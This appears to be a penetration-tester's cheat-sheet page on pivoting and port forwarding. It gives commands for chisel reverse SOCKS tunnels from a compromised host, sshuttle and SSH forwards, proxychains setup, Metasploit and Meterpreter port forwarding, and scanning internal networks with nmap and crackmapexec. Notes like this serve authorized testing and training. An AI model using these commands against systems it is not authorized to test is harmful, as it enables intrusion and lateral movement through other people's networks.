Comment on page
Pivoting and Portforwarding
# Clone Repository
git clone 'https://github.com/jpillora/chisel.git'
# Build Binary
go build
# Binary is now built and ready to be transfered over to target system.
# Attacking Machine
./chisel server -p <Port> --reverse &
./chisel server -p 1337 --reverse &
# On Target Machine
./chisel client <Attacking-IP>:<Port> R:socks &
./chisel client 10.50.46.8:1337 R:socks &
# Then use Proxychains to scan internal networks from the compromised host.
# Authenticate with password
sshuttle -r <User>@<Target-IP> <Target-Subnet> -x <Target-IP>
sshuttle -r [email protected] 172.16.0.0/24 -x 172.16.0.5
# Authenticate with key.
sshuttle -r <User>@<IP> --ssh-cmd "<Command>" <Target Subnet> -x <Exclude IP>
sshuttle -r [email protected] --ssh-cmd "ssh -i id_rsa" 10.200.48.0/24 -x 10.200.48.200
# Forward RDP from internal host to Attacking Machine on port 1337.
ssh -L <LocalHost>:<Port>:<IP-To-Forward-From>:<Port> <User>@<IP>
ssh -L 127.0.0.1:1337:10.200.48.150:3389 [email protected] -i id_rsa
# Forward remote port 80 to local port 80.
ssh [email protected] -L 80:127.0.0.1:80
ssh <User>@<IP> -L <Local-Port>127.0.0.1<Remote-Port>
# Dynamic SSH Port Forwarding
ssh -i <id_rsa> <User>@<IP> -D <Proxychains-Port>
ssh -i id_rsa [email protected] -D 1080
Change last line in
/etc/proxychains4.conf to the following value: socks5 127.0.0.1 1080Then use the following Metasploit module:
use auxiliary/server/socks_proxy
Set module options to the following (Default):
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
We can then force applications to use proxychains by initiating commands with the command
proxychains first.proxychains nmap <IP> -sT -p 1-10000 -sV -v
proxychains crackmapexec smb 10.10.10.100.5 -u '' -p ''
proxychains ssh <user>@<IP>
proxychains telnet <IP>
# /etc/proxychains.conf
# Ensure dynamic_chain is uncommented
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks5 127.0.0.1 1080 # First Pivot
socks5 127.0.0.1 1081 # Second Pivot
Meterpreter can be used to portforward for access to file shares and web servers.
portfwd add -l <LocalPort> -p <RemotePort> -r <TargetIP>
portfwd add -l 3333 -p 3389 -r 10.10.10.5
Essentially as per the example command above we could connect to RDP on our local port in order to hit the remote port.
rdesktop 127.0.0.1:3333
Whilst not a direct pivoting technique, using
xFreeRDP to share the hosts file system can give the attacker an easy route for moving files across systems to further assist with pivotingxfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
Last modified 1yr ago